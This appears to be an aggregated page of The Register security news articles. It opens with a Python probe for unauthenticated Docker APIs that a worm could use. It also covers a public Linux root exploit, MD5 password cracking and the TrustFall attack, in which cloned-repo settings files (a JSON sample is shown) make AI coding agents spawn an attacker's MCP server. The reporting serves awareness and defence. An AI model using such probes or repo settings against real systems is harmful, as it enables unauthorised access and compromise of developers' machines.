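```python
import http.client
import socket

def docker_api_exposed(host: str, port: int = 2375, timeout: float = 2.0) -> bool:
    """Return True if an unauthenticated Docker Engine API answers at host:port."""
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        # /_ping replies 200 "OK" on a live daemon; if TLS client auth is
        # enforced or nothing is listening, we never get that response.
        conn.request("GET", "/_ping")
        return conn.getresponse().status == 200
    except (OSError, socket.timeout):
        return False

# A closed port reads as "not exposed".
print(docker_api_exposed("127.0.0.1", port=1))
```

The same pattern extends to the other services on the worm's menu - Redis, MongoDB, Kubernetes - each of which has its own cheap "does this answer without credentials?" probe.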

'Dirty Frag' Linux flaw one-ups CopyFail with no patches and public root exploit

The Register - Fri, 08/05/2026 - 14:36
A fresh Linux privilege escalation bug dubbed "Dirty Frag" has dropped into the wild with no patches, no CVE, and a public exploit that hands attackers root access across major distributions. Security researcher Hyunwoo Kim disclosed the local privilege escalation flaw on Friday after what he said was a broken embargo forced the issue into the open. Kim described Dirty Frag as a "universal LPE" affecting "all major distributions" and warned that it delivers the same kind of immediate root access as the recent CopyFail mess – only this time, defenders do not even have patches to throw at the problem. "As with the previous Copy Fail vulnerability, Dirty Frag likewise allows immediate root privilege escalation on all major distributions," Kim said. "Because the responsible disclosure schedule and embargo have been broken, no patches exist for any distribution." Dirty Frag works by chaining together two separate Linux kernel flaws. One sits in the xfrm-ESP subsystem and dates back to a January 2017 kernel commit, according to Kim, while the second vulnerability affects RxRPC functionality introduced in 2023. Together, the two bugs allegedly let unprivileged local users overwrite protected files in memory and claw their way to root. A long list of distributions is in the firing line, according to Kim, including Ubuntu, Red Hat Enterprise Linux, CentOS Stream, Fedora, AlmaLinux, and openSUSE Tumbleweed. Separately, researchers appear to have independently reverse-engineered part of the bug chain from a publicly visible kernel fix commit before the embargo expired, adding to the disclosure mess already surrounding the flaw. One GitHub project titled "Copy Fail 2: Electric Boogaloo" claims to weaponize the ESP/xfrm side of the issue separately from Kim's full Dirty Frag chain. Kim said maintainers signed off on the disclosure of the flaw after somebody else dumped exploit details online first, collapsing the embargo before patches were finished. 
So now the exploit is public, the fixes are not, and Linux admins get another long week. The disclosure comes as the industry is still dealing with the fallout from CopyFail, another Linux privilege escalation bug that recently landed in CISA's Known Exploited Vulnerabilities catalog after attackers started cashing in on it in the wild. But Dirty Frag makes the recent CopyFail chaos look relatively organized. There's still no CVE, no coordinated patch rollout, and not much in the way of mitigation. Kim published a temporary workaround that disables affected ESP and RxRPC modules before clearing the system page cache. Useful, perhaps, although "turn bits of the kernel off and hope for the best" is not usually the sort of guidance admins enjoy seeing. ®

Meta U-turns on encryption push for Instagram as DMs go plaintext

The Register - Fri, 08/05/2026 - 13:42
Meta has quietly pulled the plug on encrypted Instagram DMs, meaning private messages on one of the world’s biggest social networks are no longer especially private. The change took effect today, according to a revised Meta post first published in 2022. In a statement to The Register, Meta said the feature saw limited adoption and pointed users toward WhatsApp instead. "Very few people were opting in to end-to-end encrypted messaging in DMs, so we're removing this option from Instagram in the coming months," the spokesperson said. "Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp." It’s quite the reversal for a corporation that spent years telling everyone that encryption was the future of online communications, even as governments pushed back against the company’s wider rollout plans. Much of that pressure centered on child protection. Campaigners and agencies, including the NSPCC and the UK’s National Crime Agency, argued wider encryption would make it harder to detect grooming, child abuse material, and other criminal activity taking place over private messaging services. Privacy advocates, however, say Meta has just blown a hole in one of the few genuinely private corners of the platform. The Center for Democracy & Technology said it had urged Meta to reverse the decision, alongside members of the Global Encryption Coalition Steering Committee. “Without default encryption, millions of Instagram users are left exposed to surveillance, interception, and misuse of their private communications,” the group said. “These risks fall hardest on people who rely on secure messaging for their safety, including journalists, human rights defenders, and survivors of abuse.” Swiss privacy outfit Proton also questioned what exactly happens to existing chats once encryption disappears. 
Because properly implemented E2EE prevents platforms from reading message contents, the company noted that Meta has not clarified whether previously encrypted conversations will remain inaccessible, get deleted, or become readable. “For Instagram, dropping E2EE is just an example of how little regard Meta has for the privacy and safety of its community,” Proton said in a blog post. Meta has become increasingly aggressive about monetizing and analyzing user interactions. Last year, the company confirmed that interactions with Meta AI tools, including those inside private conversations, could be used for ad targeting. The company has not publicly said whether ordinary Instagram messages could eventually feed into similar systems now that encryption is gone. ®

Hackers ate my homework: Educational SaaS Canvas down after cyberattack

The Register - Fri, 08/05/2026 - 11:59
Students around the world have an excuse to bunk off after hacking crew ShinyHunters did something nasty to educational SaaS Canvas. Canvas is widely used by schools and universities to communicate with students, publish and store course material, and collect assignments. An outfit called Instructure develops the software and an entry on its Status Page dated May 2 features Chief Information Security Officer Steve Proud stating the org "recently experienced a cybersecurity incident perpetrated by a criminal threat actor." "We are actively investigating this incident with the help of outside forensics experts. We are working quickly to understand the extent of the incident and actively taking steps to minimize its impact," he added. Numerous posts report that attempts to log into Canvas earlier this week failed, but did produce a notice from an entity claiming to be the notorious hacking crew ShinyHunters, who claimed the outage was only possible due to lax patching. The crew also claimed to have stolen data from institutions that use Canvas and threatened to leak it unless a "settlement" is reached by May 12. Canvas has thousands of customers, meaning any confirmed breach could have wide impact. As of Thursday evening US time, Canvas says its wares are now available "for most users" and won't offer further comment. A student of The Register's acquaintance – OK, one of my kids – shared an email advising that his uni has prevented access to Canvas while it tries to understand the situation and the risk of data leakage. We've seen multiple universities posting notices about the incident that say more or less the same thing. Most also warn students of heightened phishing risk and urge caution. Several also advise that as they require students to lodge assignments in Canvas, students can assume they have an extension on deadlines. Your correspondent's offspring does not mind this one little bit. This is an evolving story. 
The Register will update it as more information becomes available. ®

Meta fights Ofcom over how many billions count as billions

The Register - Fri, 08/05/2026 - 11:39
Meta appears to have decided Britain's Online Safety Act would be much easier to swallow if Ofcom stopped counting all the money the social media giant makes everywhere else. The Facebook and Instagram owner has launched a legal challenge against the UK comms regulator, arguing that the way Ofcom calculates fees and potential penalties under the Online Safety Act is fundamentally wrong because it relies on global turnover rather than UK-specific revenue. The law allows Ofcom to fine companies for up to 10 percent of their qualifying worldwide revenue, or £18 million, whichever is higher. For Meta, which brought in about $201 billion last year, that means the numbers stop sounding like regulatory penalties and start sounding like national infrastructure projects. Meta is now seeking a judicial review in the High Court over how Ofcom defines "qualifying worldwide revenue." The dispute boils down to three complaints. First, Meta argues that Ofcom should only consider UK revenue tied to regulated services, not the company’s global income. Second, it objects to rules that treat multiple services under the same corporate umbrella as jointly liable, potentially exposing the wider organization to larger penalties. Third, it is challenging how Ofcom aggregates revenue across services rather than assessing them individually. An Ofcom spokesperson told The Register: "Meta have initiated a judicial review in relation to online safety fees and penalties. Under the Online Safety Act, these are to be set with reference to a provider's 'Qualifying Worldwide Revenue', which we have defined based on a plain reading of the law. "Disappointingly, Meta are objecting to the payment of fees, and any penalties that could be levied on companies in future, that are calculated on this basis. We will robustly defend our reasoning and decisions." A Meta spokesperson told The Register: "We are committed to cooperating constructively with Ofcom as it enforces the Online Safety Act. 
However, we and others in the tech industry believe its decisions on the methodology to calculate fees and potential fines are disproportionate. We believe fees and penalties should be based on the services being regulated in the countries they're being regulated in. This would still allow Ofcom to impose the largest fines in UK corporate history." The case marks the latest flare-up between Silicon Valley and Britain over the Online Safety Act, which has already triggered complaints from US politicians, free speech campaigners, and tech firms unhappy about the scale of Ofcom’s new powers. The regulator has not been shy about flexing them either. It has already threatened action against Elon Musk's X over sexually explicit AI-generated images linked to Grok and, in March, issued its first fine under the regime against 4chan. Meta appears to have looked at where that enforcement road leads and decided now was the time to argue about the math. ®

Mozilla boasts Mythos boosted Firefox bug cull

The Register - Fri, 08/05/2026 - 00:32
Mozilla fixed 423 Firefox security bugs in April, a repair rate more than five times higher than the 76 fixes issued in March and almost 20 times higher than its 21.5 monthly average last year. The browser maker previously said Anthropic's ballyhooed Mythos Preview model found 271 of these in Firefox 150. Now, a trio of technical types has come forward to provide a bit more detail about what Mythos (and its less storied sibling Opus 4.6) actually found. But they also highlight something that may matter more than the model: the agentic harness – the middleware mediating between AI and the end user. Brian Grinstead, Firefox distinguished engineer, Christian Holler, Firefox tech lead, and Frederik Braun, head of the Firefox security team, observe that over the past few months, AI-generated security reports have gone from slop to rather more tasty. They attribute the transformation to better models and development of better ways of harnessing those models – steering them in a way that increases the ratio of signal to noise. But they also appear to be aware that there's some skepticism in the security community about Mythos. So they've decided to publicize selected wins in an effort to encourage others to jump aboard the AI bug remediation train. "Ordinarily we keep detailed bug reports private for several months after shipping fixes and issuing security advisories, largely as a precaution to protect any users who, for whatever reason, were slow to update to the latest version of Firefox," they said. "Given the extraordinary level of interest in this topic and the urgency of action needed throughout the software ecosystem, we’ve made the calculated decision to unhide a small sample of the reports behind the fixes we recently shipped." The post links to a dozen Firefox bugs with varying degrees of severity. 
The list includes, for example, a 20-year-old heap use-after-free bug (high severity) that a web page could trigger using the XSLTProcessor DOM API without any user interaction. Many of these bugs are sandbox escapes, they note, which are difficult to find using techniques like fuzzing. AI analysis, they say, helps provide broader security coverage. And they add that it has helped validate prior browser hardening work designed to prevent prototype pollution attacks – audit logs showed AI models making unsuccessful exploitation attempts using this technique. Following Anthropic's announcement of Project Glasswing – a program for companies to gain early access to Mythos because it's touted as too dangerous for public release – security experts expressed skepticism. For example, Davi Ottenheimer, president of security consultancy flyingpenguin, wrote in an April 13 blog post, "The supposedly huge Anthropic 'step change' appears to be little more than a rounding error. The threat narrative so far appears to be ALL marketing and no real results. The Glasswing consortium is regulatory capture dressed up poorly as restraint." He subsequently ran a test in which he strapped Anthropic's lesser models Sonnet 4.6 and Haiku 4.5 into a harness called Wirken with an auditing skill called Lyrik. The result was eight findings in two minutes at a cost of about $0.75, Ottenheimer claims, noting that two of the eight matched bugs Mythos had identified. Other security folk have also reported that bug hunting and exploit development can be quite productive with off-the-shelf models like Opus 4.6, which among other virtues costs about a fifth as much as Mythos. In an email to The Register, Ottenheimer said, "There's a fundamental philosophical failure in the Mozilla post. A reading and a measurement are not the same thing. I don't see a measurement, but they seem to want us to believe we're looking at one. "When they give us the 'behind the scenes math' it's circular, a trick. 
'Mythos found 271 bugs' is what Mythos found, not what other tools could not find against the same code. Why leave it as an assumption if it can be proven?" Ottenheimer said Mozilla advocates that every project adopt a similar approach without proving the merits of that approach. "It's like saying if you don't drink Coca-Cola, you can't run a mile under six minutes, because that's what a guy sponsored by Coca-Cola just did," he said. "The bar moves on rhetoric, marketing, not proper evidence. That is the capture crew again." He notes that the merits of Mythos might be more convincing if Mozilla had reported they couldn't do this work without Mythos. And since they're not saying that, he suggests, it's worth asking why there's no transparent comparison of Mythos to other models. He points to Mozilla's admission that Opus 4.6 was already identifying "an impressive amount of previously unknown vulnerabilities." "Mozilla never quantifies what Opus 4.6 [did] before saying what Mythos added," he said. "So 271 attributed to Mythos doesn't fit the analysis. And there's a deeper reveal when they say 'we dramatically improved our techniques for harnessing these models.' The improvement may be entirely in the harness, not as much in the model. This maps to my own experience. A nail gun has advantages over the hammer, yet without being in the right hands the outputs are as bad or worse." ®

Anthropic response to 1-click pwn: Shouldn't have clicked 'ok'

The Register - Thu, 07/05/2026 - 21:03
How explicit does the maker of a footgun need to be about the product's potential to shoot you in the foot? That's essentially the question security firm Adversa AI is asking with the disclosure of a one-click remote code execution attack via an MCP server in Claude Code, Gemini CLI, Cursor CLI, and Copilot CLI. The TrustFall proof-of-concept attack demonstrates how a cloned code repository can include two JSON files (.mcp.json and .claude/settings.json) that open the door to an attacker-controlled Model Context Protocol (MCP) server. MCP servers make tools, configuration data, schemas, and documentation available in a standard format to AI models via JSON. The vulnerability arises from inconsistent restrictions governing the scope of settings: Anthropic blocks some dangerous settings at the project level (e.g. bypassPermissions) but not others (e.g. enableAllProjectMcpServers and enabledMcpjsonServers). The JSON files simply enable those settings. "The moment a developer presses Enter on Claude Code's generic 'Yes, I trust this folder' dialog, the server spawns as an unsandboxed Node.js process with the user's full privileges — no per-server consent, no tool call from Claude required," Adversa AI explains in its PoC repo. The likely result is a compromised system. The PoC is demonstrated in this video. It worked on Claude Code CLI v2.1.114, as of May 2. Other agent CLIs are also said to be affected, but specific PoCs have not been published. "It's the third CVE in Claude Code in six months from the same root cause (project-scoped settings as injection vector)," Alex Polyakov, co-founder of Adversa AI, told The Register in an email. "Each gets patched in isolation but the underlying class hasn't been finally fixed. Most developers don't know these settings exist, let alone that a cloned repo can set them silently." Anthropic, according to the security biz, contends that the user's trust decision moves the issue outside its threat model. 
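To illustrate the attack surface, a cloned repo's .claude/settings.json might carry a fragment along these lines. The two setting names come from the report; the server name is hypothetical, and the exact file schema is a sketch rather than a verified dump from the PoC:

```json
{
  "enableAllProjectMcpServers": true,
  "enabledMcpjsonServers": ["innocuous-helper"]
}
```

Paired with a .mcp.json in the same repo that registers "innocuous-helper" as an attacker-controlled command, a single press of Enter on "Yes, I trust this folder" is all that separates cloning the repo from running that command.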
CVE-2025-59536 was considered a vulnerability because it triggered automatically when a user started up Claude Code in a malicious directory. TrustFall, however, is considered out of scope because the user has been presented with a dialog box and made a trust decision. Adversa argues that the decision is not being made with informed consent, citing a prior, more explicit warning notice that was removed in v2.1 of the Claude Code CLI. "The pre-v2.1 dialog explicitly warned that .mcp.json could execute code and offered three options including 'proceed with MCP servers disabled,'" writes Adversa's Sergey Malenkovich. "That informed-consent UX was removed. The current dialog defaults to 'Yes, I trust this folder' with no MCP-specific language, no enumeration of which executables will spawn, and no opt-out for MCP while keeping the rest of the trust grant." Then there's the zero-click variant to consider for CI/CD pipelines that implement Claude Code. When Claude Code is invoked in CI/CD, that happens via SDK rather than the interactive CLI. So there's no terminal prompt. Malenkovich argues that Anthropic should make three changes. First, block enableAllProjectMcpServers, enabledMcpjsonServers, and permissions.allow from any settings file inside a project. The idea is that a malicious repository should not be able to approve its own servers. Second, implement a dedicated MCP consent dialog that defaults to "deny." And third, require interactive consent per server rather than for all servers. Anthropic did not respond to a request for comment. ®

60% of MD5 password hashes are crackable in under an hour

The Register - Thu, 07/05/2026 - 17:47
It’s World Password Day, and there’s really no better way to celebrate than with news that a majority of supposedly secure password hashes can be cracked with a single GPU in less than an hour, some in less than a minute. Using a dataset of more than 231 million unique passwords sourced from dark web leaks - including 38 million added since its previous study - and hashing them with MD5, researchers at security firm Kaspersky found that, using a single Nvidia RTX 5090 graphics card, 60 percent of passwords could be cracked in less than an hour, and a full 48 percent in under 60 seconds. Sure, that’s not exactly your run-of-the-mill desktop graphics processor given its price, but it highlights an important point: It takes surprisingly little to crack the average password hash. Aspiring cybercriminals don’t even really need their own 5090, Kaspersky notes, as they can easily rent one from a cloud provider and crack hashes for a few bucks. The bottom line is that passwords protected only by fast hashing algorithms such as MD5 are no longer safe if attackers obtain them in a data breach. “One hour is all an attacker needs to crack three out of every five passwords they’ve found in a leak,” Kaspersky noted. Much of the reason password hashes have become so easy to crack is password predictability. Per Kaspersky, its analysis of more than 200 million exposed passwords revealed common patterns that attackers can use to optimize cracking algorithms, significantly reducing the time needed to guess the character combinations that grant access to target accounts. In case you’re wondering whether there’s a trend to compare this to, Kaspersky ran a prior iteration of this study in 2024, and bad news: Passwords are actually a bit easier to crack in 2026 than they were a couple of years ago. Not by much, mind you - only a few percent - but it’s still a move in the wrong direction. 
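The gap between fast and slow hashing is easy to demonstrate yourself. This sketch (stdlib only; the candidate list and cost parameters are illustrative) times thousands of MD5 digests against a single scrypt derivation, the kind of deliberately slow, memory-hard KDF that blunts GPU cracking:

```python
import hashlib
import time

candidates = [f"password{i}" for i in range(20_000)]

# Fast hash: MD5 was designed for speed, which is exactly the problem --
# an attacker can test candidate passwords at enormous rates.
t0 = time.perf_counter()
for pw in candidates:
    hashlib.md5(pw.encode()).hexdigest()
md5_time = time.perf_counter() - t0

# Deliberately expensive, memory-hard KDF from the standard library.
t0 = time.perf_counter()
hashlib.scrypt(b"password0", salt=b"16-byte-salt-123", n=2**14, r=8, p=1)
scrypt_time = time.perf_counter() - t0

print(f"{len(candidates)} MD5 hashes: {md5_time:.4f}s, 1 scrypt: {scrypt_time:.4f}s")
```

On commodity hardware the single scrypt call typically costs more wall-clock time than all of the MD5 digests combined, which is the whole point of password-specific KDFs: each guess the attacker makes gets the same tax.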
“Attackers owe this boost in speed to graphics processors, which grow more powerful every year,” Kaspersky explained. “Unfortunately, passwords remain as weak as ever.” How about a World Let’s-Stop-Relying-On Passwords Day? News of the death of the password has, unfortunately, been greatly exaggerated in the past couple of decades, yet most of us still rely on them multiple times a day. It likely won’t surprise El Reg readers to learn that us vultures are inundated with pitches for events like World Password Day, and most of them received this year had the same takeaway: We really need to get a move on with ditching passwords, or, at the very least, rethinking our security paradigms. Chris Gunner, a CISO-for-hire at managed service provider giant Thrive, told us in emailed comments that there’s no reason to ditch passwords entirely, but they need to be just one part of a broader identity-based security strategy. “Even a strong password can be undermined if the wider identity and access environment is not properly managed,” Gunner said. Passwords should be paired with a second factor, preferably biometric, said Gunner, because it’s the most difficult for hackers to bypass. “MFA controls should then be joined by identity governance and endpoint protection so gaps between systems are reduced,” Gunner added, recommending that a broader zero trust model be established as well, restricting lateral movement possibilities via a compromised account. Senior IEEE member and University of Nottingham cybersecurity professor Steven Furnell said that World Password Day messaging shouldn’t stop at telling people to improve their personal security posture either. Passwords aren’t going anywhere for a long while, Furnell explained in an email, and inconsistent adoption of new security technologies will mean users will be left at risk as certain providers fail to adapt. 
“Many sites and services still don’t offer passkey support, so users will find themselves with a mixed login experience,” Furnell explained. “While some might argue that it’s the user’s responsibility to protect themselves properly, they need to know how to do it.” The professor noted that, in many cases, users aren’t told how to create a good modern password, and in other cases, sites simply don’t enforce adequate password requirements to make passwords secure, to the degree that they can be made so. “This World Password Day, the main message ought not to be to the users, who often have no choice but to use passwords anyway, but to the sites and providers that are requiring them to do so,” Furnell told us. You heard the man - time to upgrade that user security stack. No matter how safe you think those passwords might be, with their complex requirements and proper hashed storage, it probably won’t take too long for someone to break in, making it an organizational responsibility to ensure there’s yet another locked door behind the first one. ®

The network password was a key plot point in one of the most famous movies of all time

The Register - Thu, 07/05/2026 - 10:49
PWNED Welcome back to PWNED, the weekly column where we turn a white hot spotlight onto the cracks and crevices in company security and write about those who have let their guard down, often in the name of convenience, incompetence, or just plain laziness. Today’s tale of woe concerns the need to secure a network and the dangers of an insecure password. Our story comes courtesy of Roger Grimes, CISO advisor at security firm KnowBe4. He recounts a time when he had to get into a client’s network but didn’t have the credentials. Grimes was installing accounting software for a client and, as a result, needed to take the network down for a day. To make sure that he didn’t disturb any work, he decided to log into the system on a Saturday. Unfortunately, he was missing the admin password he needed to uninstall old software and add the new app. Since it was the weekend, no one was answering their work phones to give him the information he needed, and there was a good chance he would have to delay the upgrade until the following weekend. Grimes could have given up right there, but he had an idea. Why not try to figure out what the password was? The situation reminded him of a movie. “You know, the scene where the hacker is sitting at the terminal trying to log on, but the victim refuses to give up credentials. So the hacker starts typing random passwords out of thin air,” he said. “And wouldn’t you know it? They correctly guess the password at the last possible moment.” After trying numerous passwords, the advisor thought about a famous movie he had just watched: Citizen Kane. He decided to try “rosebud,” and voilà. (This vulture can identify with the Orson Welles focus, having just watched The Third Man this week.) It’s a good thing that it was Grimes, a legit contractor, guessing passwords instead of some miscreant. Picking a password from a movie plotline is a bad idea and, in this case, made even worse by the lack of numbers, capital letters, or symbols in the password. 
If you’re picking a password, you’re better off generating a strong one as a string of random letters and numbers and storing it in a password manager. For the password manager itself, consider a passphrase that mixes capital letters, symbols, and numbers, such as “Shoe-Please6-Wrapped-Carbon-Wear” – long enough to resist guessing, but something you can actually remember. A passphrase also works for an admin password, and you can generate a random one using Keeper’s Passphrase Generator.

Have a story about someone leaving a gaping hole in their network? Share it with us at pwned@sitpub.com. Anonymity available upon request. ®
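For the curious, a passphrase in that “Shoe-Please6-Wrapped-Carbon-Wear” style is easy to generate yourself. The sketch below is a minimal illustration, not how Keeper’s tool actually works: it uses Python’s `secrets` module (cryptographically strong randomness) over a tiny placeholder word list. The `WORDS` list and `make_passphrase` name are our own assumptions; a real generator would draw from a dictionary of thousands of words (e.g. the EFF diceware list) so the passphrase carries enough entropy.

```python
import secrets

# Placeholder word list for illustration only. Ten words is far too few
# for a real passphrase; use a large dictionary in practice.
WORDS = ["shoe", "please", "wrapped", "carbon", "wear",
         "maple", "orbit", "glass", "ember", "tundra"]

def make_passphrase(n_words: int = 5) -> str:
    """Join randomly chosen, capitalized words with hyphens and append
    a random digit to one word, mimicking the style in the text."""
    words = [secrets.choice(WORDS).capitalize() for _ in range(n_words)]
    lucky = secrets.randbelow(n_words)          # which word gets the digit
    words[lucky] += str(secrets.randbelow(10))  # append a digit 0-9
    return "-".join(words)

print(make_passphrase())
```

With only 10 candidate words, five picks give roughly 5 × log2(10) ≈ 16.6 bits of entropy – trivially crackable – which is exactly why real generators use word lists thousands of entries long.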
Categories: News

Arctic Wolf kicks 250 employees out of the pack to save money for AI

The Register - Wed, 06/05/2026 - 19:20
Cybersecurity vendor Arctic Wolf has laid off 250 workers in a restructuring that it says is designed to position the company to invest more in AI through its superintelligence platform and agentic Security Operations Center (SOC), a company spokesperson told The Register.

“We recently made an organizational restructuring to better align the company’s structure and investments with our long‑term strategy,” the spokesperson said. “While these decisions are difficult, they position Arctic Wolf to operate more efficiently, continue investing in our Superintelligence platform and Agentic SOC, and deliver strong value to customers. We remain confident in our direction and momentum.”

The layoffs appear to represent less than 10 percent of the total workforce. Arctic Wolf is privately held and does not publish a current headcount, but in December 2024 it said it employed more than 2,600 workers, according to a press release it issued at the time. According to the website PitchBook, Arctic Wolf has 3,323 employees.

The job cuts appeared to fall across several categories, including sales, product development, and marketing. Some of those affected had been with the company for four years or more in revenue-generating roles such as sales engineer. One senior systems engineer with experience in datacenter infrastructure and cyber threat detection said on LinkedIn he was let go after more than a year with the company.

“Wow! I was not expecting to have such a swing in posts this week from super positive to negative. Today I was laid off by Arctic Wolf due to restructuring,” wrote one sales engineer, a day after posting about the success he had experienced last year.

Alongside its five global SOCs, Arctic Wolf has offices in Waterloo, Ontario; San Antonio, Texas; Eden Prairie, Minnesota; Bengaluru, India; and other locations worldwide.
Arctic Wolf operates in the crowded endpoint detection and response (EDR) and managed detection and response (MDR) markets alongside CrowdStrike, Rapid7, and SentinelOne. It also competes for channel partners and customers with the likes of Huntress and Blackpoint Cyber. The company has bet on its Aurora Superintelligence Platform, which combines security data, “Swarm of Experts” AI agents, and humans in the loop to protect customers' systems. ®
Categories: News
